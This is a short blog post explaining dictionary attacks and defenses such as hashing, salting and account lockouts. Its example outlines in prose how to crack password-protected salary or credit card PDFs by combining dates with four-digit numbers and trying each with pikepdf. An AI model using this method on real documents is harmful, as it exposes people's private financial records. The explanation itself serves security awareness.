Back to Blog

The Hidden Danger of Dictionary Attack

4 min read min read
SecurityPython

What is a Dictionary Attack

A dictionary attack is a type of cyberattack in which an attacker systematically tries to gain unauthorized access to a user's account or system by trying out a vast number of potential passwords. Unlike brute-force attacks that try every possible combination of characters, dictionary attacks focus on trying a list of commonly used passwords, words from dictionaries, or variations thereof.

The process involves using automated software or scripts to iterate through a list of passwords, which can include common words, phrases, names, and terms found in dictionaries, as well as variations like adding numbers or special characters to the end of words. The goal is to match one of these potential passwords to the actual password used by the target user.

Dictionary attacks take advantage of the fact that many users still use weak and easily guessable passwords, often derived from familiar words or personal information. By leveraging a targeted list of potential passwords, attackers can increase their chances of successfully cracking accounts with minimal effort and time.

Anatomy of a Dictionary Attack

At its core, a dictionary attack is a type of password-cracking attack that takes advantage of human nature's tendency to choose simple and common passwords. Unlike brute-force attacks that exhaustively try every possible combination, dictionary attacks focus on a targeted approach. Here's how it typically unfolds:

  1. Gathering Password Candidates: Attackers compile a list of potential passwords, often using dictionaries containing common words, phrases, and variations. These lists can also include personal information about the target, like birthdays or pet names.

  2. Automated Trial and Error: Using automated scripts or tools, attackers systematically try each password candidate from the list against the target account or system.

  3. Success or Failure: If the target's password matches one of the candidates, the attacker gains unauthorized access. If not, they might refine their list and try again.

Real Case Example of Dictionary Attack

Password Protected PDF

Companies often utilize password protection for sensitive PDF documents like salary statements or credit card statements, which they send individually to recipients on a monthly basis. These documents are secured with a specific password format. Often, you'll notice a recurring pattern in these passwords - they tend to be a combination of the company's initials and a date, or they might consist of a date merged with the last four digits of the corresponding credit card number.

Here is a short explanation regarding how it works to crack the password protected PDF:

Basically all that you need to have is 4 scripts:

  • Script to get list of all of the dates in ddmmyyyy format since predefined dates that you desired
  • Script to get list of all possible 4 digits start from 0000 to 9999
  • Script to generate the combinations of all of the dates and 4 digits that you just generate
  • Script that manipulates pdf (ex: pikepdf in python) and try all of the listed combinations to open the PDF

The Engineering Challenge

Engineers face the complex task of devising robust mechanisms to defend against dictionary attacks. Here are some key engineering considerations:

  • Hashing Algorithms: To protect user passwords, engineers employ strong cryptographic hashing algorithms. These algorithms convert passwords into fixed-length hash values, making it extremely challenging for attackers to reverse-engineer the original password.

  • Salting: Adding an extra layer of defense, engineers use a technique called salting. A unique salt value is added to each password before hashing, ensuring that even if two users have the same password, their hashed values will differ.

  • Password Policies: Engineers play a pivotal role in implementing and enforcing password policies. These policies can require users to create passwords with a mix of character types, minimum length, and no usage of common dictionary words.

  • Account Lockouts and Delays: Engineers often incorporate mechanisms that lock out accounts temporarily after a certain number of failed login attempts. Additionally, introducing time delays between login attempts can thwart rapid dictionary attacks.

Conclusion

In the intricate dance between hackers and engineers, the dictionary attack is a formidable move in the attacker's playbook. However, engineers armed with cryptographic expertise and a deep understanding of human behavior continue to innovate and bolster their defenses. By implementing advanced hashing, salting, and smart user authentication strategies, engineers work tirelessly to fortify systems and keep users' digital lives safe from the clutches of these relentless attacks.